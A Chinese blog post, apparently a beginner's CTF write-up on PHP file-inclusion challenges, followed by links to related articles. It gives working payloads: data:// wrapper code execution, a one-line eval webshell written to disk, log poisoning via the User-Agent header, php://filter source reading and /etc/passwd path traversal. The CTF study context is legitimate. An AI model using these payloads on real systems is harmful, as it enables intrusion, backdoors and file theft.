CTF入门之php文件包含

已于 2022-08-10 14:47:49 修改
阅读量2.1k 收藏 4
点赞数
分类专栏: 笔记 文章标签: php nginx
于 2022-07-23 12:27:32 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37410729/article/details/125945956
版权

一.php伪协议执行代码
在这里插入图片描述
由图可知,只需要通过get请求传送url变量即可触发include函数,一开始的思路是直接才flag的文件名,如flag.php等等,然后都失败了,然后想到了文件包含漏洞,利用php伪协议。

https://blog.csdn.net/yao_xin_de_yuan/article/details/108326427 php伪协议介绍

这里有两种方法:
1.url=data://text/plain,<?php print_r(glob("*")); ?> 通过通配符查找目录下的所有文件
在这里插入图片描述
找到两个文件,其中ctf_go_go_go文件中即为flag
在这里插入图片描述
2. 构造url=data:text/plain,<?php fputs(fopen("shell.php","w"),"<?php eval($_POST['h']);?>")?> 然后使用菜刀或蚁剑进行连接即可。

在这里插入图片描述
连接成功,打开相关文件即可。

二.日志注入
在这里插入图片描述
题目和上题一样,但用php伪协议是发现发生错误,所以应该是过滤了php,然后就可以进行日志注入。可以服务器问nginx,所以其日志目录为/var/log/nginx/access.log和/var/log/nginx/error.log

因此构造url=/var/log/nginx/access.log

发现日志会记录请求方法和user-agent 因为请求方法不能变,因此我们可以在user-agent处插入php代码,利用bp将user-agent字段改为<?php eval($_POST['h']);?> 发送后发现日志文件中的ua处为空,这是因为php代码会直接运行,而不会显示。然后我们用菜刀或蚁剑连接即可,但要注意url
在这里插入图片描述
进入后随便翻翻即可找到flag。

3.php伪协议读取文件

在这里插入图片描述
题目url如图,因为页面中并无明确提示,因此可以利用php伪协议读取文件内容看一下

构造url:?file=php://filter/read=convert.base64-encode/resource=flag.php

在这里插入图片描述
可以看到文件内容经过base64编码,我们解码一下即可得到flag
在这里插入图片描述
最后补充一下,include包含文件时,用/分隔可以包含多个文件。如file=source.php/../../../../etc/passwd

SevenCold
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTF 入门指导教程
12-04
CTF(Capture The Flag)中文一般译作夺旗赛,在网络安全领域中指的是网络安全技术人员之间进行技术竞技的一种比赛形式。CTF起源于1996年DEFCON全球黑客大会,以代替之前黑客们通过互相发起真实攻击进行技术比拼的方式。发展至今,已经成为全球范围网络安全圈流行的竞赛形式,2013年全球举办了超过五十场国际性CTF赛事。而DEFCON作为CTF赛制的发源地,DEFCON CTF也成为了目前全球最高技术水平和影响力的CTF竞赛,类似于CTF赛场中的“世界杯” 。
CTF入门笔记(请大家看看)
02-25
CTF入门笔记(请大家看看)
关于 CTFphp 考点与绕过那些事的总结
最新发布
Welcome To Myon'Blog !
03-04 1577
_POST //获取post数据,是一个字典$_GET //获取get数据,是一个字典$_COOKIE //获取cookie数据$_SESSION //获取session数据$_FILES //获取上传的文件$_REQUEST //获取$_GET, $_POST, $_COOKIE中的数据$_SERVER //用户和服务器的基本信息数据库$_ENV //环境数据$GLOBALS //所有全局变量。
CTF入门到提升(一).docx
12-18
CTF入门到提升(一).docx
ctf入门专用.rar
03-01
CTF入门专用pdf文档,学完改文档,你入门是没有问题了, 1.基础知识篇 2.工具篇 3.分类技巧篇 4.高级篇 5.题解篇 6.实战篇 7.学术篇
CTF入门指导
07-18
CTF入门指导,包含以下文档:Crypto.Code介绍.pdf;misc-写在前面的话.doc;PWN入门指导.docx;PWN入门指导.pdf;rev-知识储备.doc;Web基础-Cookie介绍.docx;Web基础-HTML介绍.docx;Web基础-HTTP协议.docx;Web基础-SQL语言入门.docx。 是CTF新手入门的得力法宝!!!
CTFPHP基础学习篇(一)
热门推荐
ioik~hk的博客
03-20 1万+
CTFPHP基础。 文章目录 前言 一、PHP是什么? 二、配置PHP环境 三、PHP基础语法介绍 前言 估摸着不少学计算机的同学以及其他专业的小部分同学都对于信息安全感兴趣吧!那对于参加这相关的比赛就应该更有兴趣了。那么我们首先就了解一下下这相关的比赛——CTF(Capture The Flag)。
ctf-攻防世界-web:Web_php_include
一只菜鸟的博客
11-21 5641
先看题目标题,php_include,猜测为文件包含漏洞。 打开环境,看到这样一段代码:
攻防世界CTF —— PHP本地文件包含漏洞解题思路
weixin_47610939的博客
07-27 3871
攻防世界的CTF web类题目,关于php本地文件包含漏洞的解题思路
PHP文件包含漏洞总结
坚持硬核
10-07 2897
首先,我们学习两个函数:require(string) include(string)这两个函数的作用是相同的, 就是将一个文件的内容包含在其所在的php代码中。 例如:我们写了一个1.txt文件放在服务器上,其内容为:<?php phpinfo()?> 当我们去请求这个页面的时候,自然而然,页面会原封不动的将这句话显示出来,那么有什么骚姿势可以让这句话作为php代码被解析呢? 嘿...
CTF中常用的php原生类总结
记录学习,一起进步
06-12 2792
CTF中常用的php原生类总结
CTF入门基础pdf版
05-05
CTF入门基础
php黑魔法【CTFphp总结】
大方子
08-24 1万+
前言 php的很多特性再带来编程方面的同时也会带来很多安全隐患,其中一些漏洞在CTF中经常出现,本文大部分示例也是取自CTF题目。这里首先说一下==和===区别。==是比较运算,它不会去检查条件式的表达式的类型,===是恒等,它会检查查表达式的值与类型是否相等,NULL,0,”0″,array()使用==和false比较时,都是会返回true的,而使用===却不会。 注:本文部分内容及代码并非原...
CTFPHP知识点的小运用(二)
ioik~hk的博客
03-27 1万+
CTF刷题是必不可少滴。 上一讲我们已经了解了PHP的基础知识点,这一讲我们来学习一下ctfPHP知识点具体的运用。
CTF怎么快速入门
qq_52553510的博客
01-16 1万+
前言 CTF(Capture The Flag)中文一般译作夺旗赛,在网络安全领域中指的是网络安全技术人员之间进行技术竞技的一种比赛形式。CTF起源于1996年DEFCON全球黑客大会,以代替之前黑客们通过互相发起真实攻击进行技术比拼的方式。是目前青少年,最喜欢参加的竞赛之一。 如何入门 ? 首先,我们必须要了解什么CTF的比赛规则,一般的CTF比赛分为以下两个阶段: 1.线上选拔比赛: 主要考察的题目范围包括:1.Web安全,2.Reverse(逆向工程)3.Crypto(密码学) 4.PWN(二进制)
CTF学习路线!最详细没有之一!(建议收藏)
ytt0523_com的博客
09-22 830
最近很多朋友在后台私信我,问应该怎么入门CTF
PHP特性之CTF中常见的PHP绕过
Welcome To Myon'Blog !
07-18 5195
一、关于md5()和sha1()的常见绕过 1、使用数组绕过 2、 使用特殊字符串绕过 二、strcmp绕过 三、switch绕过 四、intval绕过
CTF | 网络安全】攻防世界 Web_php_include【php伪协议|data伪协议|file伪协议】
等风来
05-22 8743
该题考察文件包含漏洞,涉及PHP伪协议data伪协议file伪协议及PHP内置函数等知识点,希望读者躬身实践。我是秋说,我们下次见。
ctf安全竞赛入门pdf下载
06-05
首先,CTF(Capture the Flag)安全竞赛是一个非常有意思的计算机安全竞赛项目。如果您想了解如何参加CTF安全竞赛,您可以下载ctf安全竞赛入门pdf,这样您就可以找到您需要的答案。 CTF安全竞赛入门pdf是一个入门级别的文档,这里面包含了CTF安全竞赛的介绍、规则、常用工具、攻击技术等方面的基础内容。一般来说,通过这个文档可以很好地入门CTF安全竞赛并开始尝试进行一些初步攻击和防御。 另外,下载CTF安全竞赛入门pdf也需要注意一些安全风险。如果您不确定下载的源头是否可靠,最好不要轻易下载和打开这样的文件。下载并阅读pdf文档时,最好在安全的环境下进行(比如在设有防火墙、杀毒软件的计算机上)。 总之,通过下载CTF安全竞赛入门pdf可以快速了解CTF安全竞赛的一些基本概念和技术,并为您接下来的学习和实践打下基础。但是在下载和使用前,请谨慎考虑安全风险。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值